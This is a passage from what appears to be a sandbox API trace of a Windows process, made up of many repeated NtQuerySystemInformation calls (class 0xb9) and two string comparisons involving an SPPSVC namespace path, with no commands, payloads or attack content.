ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc590, Length=0x28, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0272.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc610, Length=0x28, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc4b0, Length=0x20, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0272.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc430, Length=0x20, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6f0, Length=0x38, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc570, Length=0x20, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0272.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc500, Length=0x20, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x50, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x28, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x28, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x38, ResultLength=0x0) [0272.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x20, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.862] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.872] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x50, ResultLength=0x0) [0272.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, 